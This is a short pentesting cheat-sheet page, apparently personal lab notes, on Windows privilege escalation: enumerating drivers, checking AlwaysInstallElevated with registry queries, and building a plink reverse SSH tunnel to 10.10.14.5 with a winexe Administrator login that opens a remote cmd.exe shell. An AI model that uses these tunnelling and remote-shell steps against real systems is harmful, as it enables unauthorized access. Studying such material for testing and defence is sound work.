search

Misc

hashtag
Vulnerable Drivers

Some driver might be vulnerable. I don't know how to check this in an efficient way.

# List all drivers
driverquery

hashtag
AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
LogoWell, That Escalated Quickly…To Shell And Back: Adventures In Pentestingchevron-right

hashtag
Port forwarding

LogoDownload PuTTY: latest release (0.83)www.chiark.greenend.org.ukchevron-right

We can make SSH on our Kali Linux and then connect to it.

  • plink.exe: The command-line interface for the PuTTY SSH client, used here on a Windows system.

  • -l root: Specifies the login name as "root".

  • -pw toor: Provides the password "toor" for authentication.

  • -R 445:127.0.0.1:445: Sets up a Remote Port Forwarding tunnel. It tells the remote server to listen on port 445 and forward any traffic received there back to port 445 on the local machine (localhost).

  • 10.10.14.5: The destination IP address of the SSH server where the tunnel is being established.

  • winexe: A GNU/Linux tool used to execute commands remotely on Windows operating systems.

  • -U Administrator%Welcome1!: Specifies the credentials for authentication.

    • Administrator: The target username.

    • %: The separator used between the username and password.

    • Welcome1!: The password for the Administrator account.

  • //127.0.0.1: The target IP address. In this case, it is pointing to the local loopback address, likely used in conjunction with a port forwarding tunnel (like the plink command seen previously).

  • "cmd.exe": The specific command or executable to be run on the remote Windows machine.

hashtag
Utility

The primary utility of this command is remote command execution on a Windows system from a Linux environment.

By targeting 127.0.0.1, the user is likely utilizing an established SSH tunnel to securely pipe commands into a remote network. This allows an administrator (or a penetration tester) to gain an interactive command-line shell (cmd.exe) on a Windows target without needing a graphical interface like RDP.

PreviousWindows Subsystem for LinuxNextMeterpreter Kiwi plugin

Last updated